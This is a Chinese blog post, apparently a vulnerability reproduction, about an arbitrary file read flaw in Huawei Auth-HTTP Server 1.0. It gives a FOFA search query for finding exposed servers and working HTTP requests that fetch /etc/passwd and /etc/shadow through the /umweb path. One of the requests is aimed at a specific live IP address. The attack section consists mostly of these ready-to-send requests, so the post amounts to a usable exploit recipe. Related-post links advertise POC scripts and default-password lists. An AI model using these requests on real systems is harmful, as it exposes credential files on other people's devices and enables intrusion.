华为Auth-HTTP服务器任意文件读取漏洞

最新推荐文章于 2024-04-27 15:05:51 发布
最新推荐文章于 2024-04-27 15:05:51 发布
阅读量2.3k 收藏 10
点赞数 8
分类专栏: 漏洞复现 文章标签: 漏洞复现 web安全 华为 auth-Http服务器 任意文件读取漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiayu729100940/article/details/135249633
版权

华为Auth-Http Server 1.0存在任意文件读取,攻击者可通过该漏洞读取任意文件。

1.漏洞级别

高危

2.漏洞搜索

fofa

server="Huawei Auth-Http Server 1.0"

3.漏洞复现

构造

GET /umweb/passwd HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

即可成功获取数据
在这里插入图片描述同理,构造

GET /umweb/shadow HTTP/1.1
Host: 60.23.25.42:8887
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

在这里插入图片描述这里的umweb路径等价于/etc,后面接文件的地址

/umweb/passwd = /etc/passwd
同理还可以访问
/umweb/shadow
/umweb/hosts等敏感文件

注:可惜的是这个漏洞无法跨越目录访问,只能在/etc目录下进行访问,因此利用价值相对有限,无法获得过多的敏感数据,属于是是个鸡肋漏洞了。

在这里插入图片描述

fly夏天
关注
  • 8
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
华为 Auth-HTTP Server 1.0 任意文件读取漏洞复现 [附POC]
薛定谔嘚喵博客
12-12 1081
华为 Auth-HTTP Server 1.0华为公司提供的一种身份验证及授权解决方案。它是一个基于HTTP协议的身份认证服务器,旨在为企业网络和系统提供安全的访问控制服务。该服务存在任意文件读取漏洞
Huawei Auth-HTTP Server 1.0 任意文件读取
weixin_43567873的博客
03-09 110
Huawei Auth-HTTP Server 1.0 任意文件读取
华为Auth-HTTP服务器任意文件读取漏洞处理
黄树茂博客
12-29 1412
处理方式:关闭web-authentication服务。华为防火墙认证服务漏洞
auth-server-demo:Spring授权服务器0.1.0 && Spring Boot 2.4.2
05-12
授权码认证 curl --location --request GET ' http://localhost:3000/oauth2/authorize?client_id=pig&client_secret=pig&response_type=code&redirect_uri=http://localhost:8080/renren-admin/sys/oauth2-sso ' 获取令牌 curl --location --request POST ' http://localhost:3000/oauth2/token ' \ --header ' Authorization: Basic cGlnOnBpZw== ' \ --header ' Content-Type: application/x-www-form-urlencoded ' \ --data-urlencode '
漏洞复现华为Auth-Http服务存在任意文件读取
知黑而守白
12-19 263
华为Auth-Http Server 1.0任意文件读取,攻击者可通过该漏洞读取任意文件
华为Auth-Http Serve任意文件读取
zkaqlaoniao的博客
11-09 2579
华为Auth-Http Server 1.0任意文件读取,攻击者可通过该漏洞读取任意文件
Huawei Auth-Http Server 1.0 passwd文件泄露漏洞POC
07-05
-u 指定单个url -l 指定url文件 先用fofa脚本爬取所有Huawei Auth-Http相关资产(fofa脚本下载地址:) python3 fofa-cwillchris.py -k body="umweb/u20.png" 然后用此脚本 ./poc.bin -l url.txt
Huawei Auth-Http Server 1.0 passwd文件泄露漏洞
Cwillchris的博客
07-05 2370
/Huawei-Auth-Http-Server1.0passwd文件泄露.bin -l 1.txt (将上面爬取到的文件(一般是final****.txt)移动到脚本目录下,保存为1.txt。先用fofa脚本爬取所有碧海威相关资产(
漏洞复现华为Auth-Http服务文件读取漏洞
晚风不及你
12-18 1891
Huawei Auth-HTTP Server 1.0 可以实现基于角色的访问控制,通过用户的身份认证和权限控制,确保只有经过授权的用户可以访问特定的资源和服务。它支持常见的身份认证协议和技术,如LDAP、RADIUS、TACACS+等,能够与企业现有的认证系统无缝集成,提供一致的认证体验。
Huawei Auth-HTTP Server 1.0 存在任意文件读取漏洞 附POC软件
nnn2188185的博客
12-12 1010
Huawei Auth-HTTP Server 1.0华为公司提供的一种身份验证及授权解决方案。它是一个基于HTTP协议的身份认证服务器,旨在为企业网络和系统提供安全的访问控制服务。
漏洞复现-华为Auth-HTTP服务器任意文件读取漏洞(附漏洞检测脚本)
jjjj1029056414的博客
12-11 2100
漏洞复现-华为Auth-HTTP服务器任意文件读取漏洞,附带自己写的poc脚本
华为网络设备&服务器默认口令汇总.xls
08-07
华为网络设备与服务器默认口令汇总,这才是网工的宝典之一,不管做甲方还是做乙方,在国内华为的设备还是很常见的。
HCIA-Datacom V1.0
03-15
HCIA-Datacom 实验室搭建指南V1.0.pdf 708 kB 2022/3/15 15:43:22 HCIA-Datacom V1.0 考试大纲.pdf 211 kB 2022/3/15 14:47:45 HCIA-Datacom V1.0 培训教材.pdf 117 MB 2022/3/15 14:55:53 HCIA-Datacom V1.0 实验...
behavioral-auth:行为认证 Chrome 插件
06-09
行为认证 行为认证 Chrome 插件 此扩展程序建立、跟踪和检测用户配置文件的异常更改
网络安全(黑客技术)—2024自学手册
TDJYGC的博客
04-20 1121
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全与密码学
最新发布
weixin_61074128的博客
04-27 411
一、密码学是一门研究信息安全保密的学科,主要涉及对信息进行加密、解密以及相关的安全技术和理论。它通过使用各种加密算法和技术,将明文信息转换为密文,以确保信息在传输和存储过程中的保密性、完整性和真实性。密码学在通信、电子商务、金融、军事等领域都有着广泛的应用。密码学包括对称加密、非对称加密、哈希函数、数字签名等重要内容。同时,密码学也在不断发展和创新,以应对不断变化的安全挑战。大家要注意的是我们平时用来认证身份的密码(passwd)翻译成口令更准确。
网络安全思考题
weixin_62304542的博客
04-27 446
网络安全渗透思考题
【网络安全】常见的网路安全设备及功能作用总结
白帽黑客八哥的博客
04-22 375
一种整合多种安全功能(如防火墙、防病毒、内容过滤等)于一体的网络安全设备。
【网络安全HTTP协议 — 特点
享你所想
04-23 923
【问题】为什么登录一个某些网站后,间隔一段时间,网站还是知道我们是谁呢?方法是为了告知服务器,该请求的意图是什么,向服务器所请求的资源下达命令。Http协议规定,请求从客户端发起,由服务端来响应该请求并返回。2)持久连接(HTTP keep alive)有问题可私聊:QQ:3375119339。1.URI(统一资源标识符)1)持久连接要解决的问题。五、持久连接&管线技术。1.不保存状态的协议。六、cookie技术。
huawei auth-http server 1.0
09-01
Huawei Auth-HTTP Server 1.0华为公司提供的一种身份验证及授权解决方案。它是一个基于HTTP协议的身份认证服务器,旨在为企业网络和系统提供安全的访问控制服务。 Huawei Auth-HTTP Server 1.0 可以实现基于角色的访问控制,通过用户的身份认证和权限控制,确保只有经过授权的用户可以访问特定的资源和服务。它支持常见的身份认证协议和技术,如LDAP、RADIUS、TACACS+等,能够与企业现有的认证系统无缝集成,提供一致的认证体验。 此外,Huawei Auth-HTTP Server 1.0 还具备安全审计与日志功能,可以记录和追踪用户的访问活动,为企业的安全风险管理提供重要的数据支持。它可以生成详细的访问日志,包括用户身份、访问时间、访问内容等信息,帮助企业了解和分析网络访问情况,及时发现异常活动和潜在的安全威胁。 Huawei Auth-HTTP Server 1.0 还提供了可视化的管理界面,管理员可以通过简单直观的操作完成用户账号的创建、配置角色权限、管理访问策略等任务,提高工作效率。同时,它支持高可用和容灾机制,能够保证身份认证和授权服务的持续可用性,降低系统故障对业务造成的影响。 总之,Huawei Auth-HTTP Server 1.0 是一款功能强大、安全可靠的身份验证和授权解决方案,能够有效保护企业的资源和网络安全,提供用户友好的身份认证体验,是企业网络安全管理中的重要工具。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值